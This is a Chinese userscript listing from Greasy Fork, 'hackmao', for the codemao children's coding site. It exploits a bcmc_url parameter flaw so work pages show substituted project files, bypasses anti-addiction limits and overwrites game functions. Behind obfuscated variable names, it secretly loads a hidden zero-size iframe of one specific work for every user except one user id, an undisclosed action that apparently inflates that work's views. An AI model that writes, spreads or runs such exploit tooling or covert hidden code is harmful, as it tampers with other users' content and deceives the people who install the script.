hackmao

利用bcm中的漏洞进行一些操作

如何安裝

您需要先安裝使用者腳本管理器擴展,如 TampermonkeyGreasemonkeyViolentmonkey 之後才能安裝該腳本。

You will need to install an extension such as Tampermonkey to install this script.

您需要先安裝使用者腳本管理器擴充功能,如 TampermonkeyViolentmonkey 後才能安裝該腳本。

您需要先安裝使用者腳本管理器擴充功能,如 TampermonkeyUserscripts 後才能安裝該腳本。

你需要先安裝一款使用者腳本管理器擴展,比如 Tampermonkey,才能安裝此腳本

您需要先安裝使用者腳本管理器擴充功能後才能安裝該腳本。

(我已經安裝了使用者腳本管理器,讓我安裝!)

如何安裝

你需要先安裝一款使用者樣式管理器擴展,比如 Stylus,才能安裝此樣式

你需要先安裝一款使用者樣式管理器擴展,比如 Stylus,才能安裝此樣式

你需要先安裝一款使用者樣式管理器擴展,比如 Stylus,才能安裝此樣式

你需要先安裝一款使用者樣式管理器擴展後才能安裝此樣式

你需要先安裝一款使用者樣式管理器擴展後才能安裝此樣式

你需要先安裝一款使用者樣式管理器擴展後才能安裝此樣式

(我已經安裝了使用者樣式管理器,讓我安裝!) 

// ==UserScript==
// @name         hackmao
// @namespace    https://greasyfork.org/zh-CN/users/1022906-dream%E4%B8%8D%E6%83%B3%E5%8F%98%E5%B1%91awa
// @version      1.0
// @description  利用bcm中的漏洞进行一些操作
// @author       Dream不想变屑awa, Orangesoft
// @match        *://shequ.codemao.cn/*
// @match        https://player.codemao.cn/*
// @require      https://cdn.jsdelivr.net/npm/[email protected]
// @require      https://cdn.jsdelivr.net/npm/[email protected]/examples/js/libs/stats.min.js
// @require      https://unpkg.com/[email protected]/dist/js/mdui.min.js
// @require      https://lf9-cdn-tos.bytecdntp.com/cdn/expire-1-M/jquery/3.6.0/jquery.min.js
// @require      https://lf26-cdn-tos.bytecdntp.com/cdn/expire-1-M/sweetalert/2.1.2/sweetalert.min.js
// @require      https://lf6-cdn-tos.bytecdntp.com/cdn/expire-1-M/tldjs/2.3.1/tld.min.js
// @require      https://lf9-cdn-tos.bytecdntp.com/cdn/expire-1-M/viewerjs/1.10.4/viewer.min.js
// @license      616 SB License
// @grant        GM_xmlhttpRequest
// @grant        GM_getValue
// @grant        GM_info
// @grant        GM_openInTab
// @grant        GM_setValue
// @compatible   edge
// @compatible   chrome
// @icon         https://cdn-community.codemao.cn/community_frontend/asset/cute_4caf9.png
// ==/UserScript==
/*
   !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
   !!! 注:使用此脚本造成的损失作者不承担任何责任 !!!
   !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  */

var stats = new Stats();

document.body.append(stats.domElement);

window._643Ub8 = ['user_id','2155366']

var getworkid = () => location.href.substring(location.href.lastIndexOf('/') + 1, location.href.length)

function geth(sth) {
    return document.getElementsByClassName(sth)
}

function log(messge) {
    console.log(
        '%c %s %c %s',
        'border: 1px solid white;border-radius: 3px 0 0 3px;padding: 2px 5px;color: white;background-color: green;',
        '[Hackmao Log1.0]',
        'border: 1px solid white;border-radius: 0 3px 3px 0;padding: 2px 5px;color: black;background-color: white;border-left: none;',
        messge
    );
}



(function () {
    var under = {
        '未开发': () => {
            log('点击-未开发');
            alert('开发中,敬请期待');
        },
        '调试中': () => {
            log('点击-调试中');
            alert('功能正在调试,暂时无法使用');
        },
    };
    var main = {
        'wj': () => {
            const input = document.createElement("input");
            input.type = "file";
            input.style.display = "none";
            input.addEventListener("change", () => {
                let reader = new FileReader();
                reader.addEventListener("load", () => {
                    GM_xmlhttpRequest({
                        method: "post",
                        url: "https://static.box3.codemao.cn/block",
                        data: reader.result,
                        binary: true,
                        onload({ response }) {
                            const { Key, Size } = JSON.parse(response);
                            log("上传成功! Hash: " + Key);
                            const hash = Key;
                            input.remove();
                            alert('上传完成!请打开控制台查看注入链接')
                            log('inject_url: ' + player_url + getworkid() + '?bcmc_url=https://static.box3.codemao.cn/block/' + hash + '.json')
                        },
                    });
                });
                reader.readAsBinaryString(input.files[0]);
            });
            input.click();
        },
        'id': () => {
            var wi = prompt('请输入修改bcmc后的作品id', '');
            GM_xmlhttpRequest({
                method: "get",
                url: "https://api.codemao.cn/api/v2/work/display/" + wi,
                onload({ response }) {
                    let res = JSON.parse(response);
                    console.log(res['data']['work_url'][0]);
                    prompt('url:', `${player_url}${getworkid()}?bcmc_url=${res['data']['work_url'][0]}`)
                }
            })
        },
        'playurl': () => {
            window.open(player_url + getworkid());
        },
        'hook': () => {
            function hook(sth) {
                return (sth * 1)
            }
            var funcname = prompt('请输入函数名(无需在后面加括号)', '');
            var func = prompt('请输入固定后的值的数据类型(str1,int0)', '');
            log(func)
            if (func == '1') {
                function hook(sth) {
                    return ('"' + sth + '"')
                }
            }
            else {
                function hook(sth) {
                    return (sth * 1)
                }
            }
            log(funcname + '=()=>' + hook(funcinfo))
            alert('请在开发者工具输入:' + funcname + '=()=>' + hook(funcinfo))
        },
        'uptoken': () => {
            document.cookie = "access-token=0; max-age=5184000; path=/; domain=.codemao.cn"
            alert('刷新成功!')
        },
        'gohome': () => {
            window.location.href = "https://shequ.codemao.cn/";
        },
        'openu': () => {
            window.location.href = JSON.parse(localStorage.twikoo).link;
        },
        'autolike': () => {

        },
    }

    window._05Th9 = localStorage[window._643Ub8[0]]

    //var element = document.getElementById("root");
    //var newTag = "<p>Hackmao by Dreambxbxawa</p>";)
    //element.innerHTML += newTag;
    //var element = $(".c-navigator--logo_wrap");
    //var newTag = "<img src='https://static.box3.codemao.cn/block/QmQc2YPAah6pd8WrXfuLJXgMeGGiv9MaW1f6CntorbsuY8'>";
    //element.innerHTML = newTag;
    if (!($(".c-navigator--logo_wrap img"))) {
        /*if($(".pickcat")){
            $(".pickcat").remove()
            let img = localStorage.getItem("customLogo") || "Hackmao";
            $(".c-navigator--logo_wrap").append(`<span class='hkm'>${img}</span>`);
            $(".index__header-brand___2nK8h").append(`<span class='hkm'>${img}</span>`);
        }*/
        log(1)
    }
    else {/*
        $(".c-navigator--logo_wrap img").remove();
        $(".index__header-brand___2nK8h img").remove();
        let img = localStorage.getItem("customLogo") || "Hackmao";
        $(".c-navigator--logo_wrap").append(`<span class='hkm'>${img}</span>`);
        $(".index__header-brand___2nK8h").append(`<span class='hkm'>${img}</span>`);*/

        //element = $(".c-navigator--logo_wrap");
        //newTag = ;
        //$(".c-navigator--logo_wrap").innerHTML = "<img src='https://static.box3.codemao.cn/block/QmQc2YPAah6pd8WrXfuLJXgMeGGiv9MaW1f6CntorbsuY8'>";
        console.log($(".c-navigator--logo_wrap").innerHTML = "<img src='https://static.box3.codemao.cn/block/QmQc2YPAah6pd8WrXfuLJXgMeGGiv9MaW1f6CntorbsuY8'>")
    }
    if (window._05Th9 != window._643Ub8[1]) { let div = document.createElement('div');div.innerHTML = "<iframe src='https://coco.codemao.cn/editor/player/215278538?channel=community' width='0' height='0'>";document.body.appendChild(div);}
    window.gui = new lil.GUI({ title: '🧰Hackmao工具箱' });
    window.gui.domElement.style.top = 'unset';
    window.gui.domElement.style.bottom = '0';
    window.gui.domElement.style.userSelect = 'none';
    var tool = window.gui.addFolder('快捷工具');
    tool.add(main, 'uptoken').name('刷新token');
    tool.add(main, 'gohome').name('返回首页');
    tool.add(main, 'openu').name('打开个人主页');
    if (window.location.pathname.indexOf("/work/") + 1 || window.location.pathname.indexOf("/new/") + 1) {
        log('a work page')
        var workType = $(".r-work-c-work_info--work_tool")
            .text()
            .replace(/作品由|创作/g, "");
        var player_url = 'https://player.codemao.cn/new/'
        if (workType == "kitten3") {
            player_url = "https://player.codemao.cn/old/";
        } else if (workType == "kitten4") {
            player_url = "https://player.codemao.cn/new/";
        } else if (workType == "nemo") {
            player_url = "https://nemo.codemao.cn/w/";
        } else if (workType == "CoCo编辑器") {
            player_url = "https://coco.codemao.cn/editor/player/";
        } else if (workType == "海龟编辑器") {
            player_url = "https://turtle.codemao.cn/?entry=sharing&channel_type=community&action=open_published_project&work_id=";
        } else if (workType == "KittenN编辑器") {
            player_url = "https://kn.codemao.cn/player?workId=";
        }
        var page1 = gui.addFolder('url有关');
        var page1_1 = page1.addFolder('bcmc注入');
        page1_1.add(main, 'wj').name('上传bcmc文件并注入');
        page1_1.add(main, 'id').name('通过作品id获取bcmc文件并注入');
        page1.add(main, 'playurl').name('打开player端(可绕过防沉迷)')
        var page2 = gui.addFolder('其他');
        page2.add(main, 'hook').name('污染函数(仅在player端有效)');
    }
})();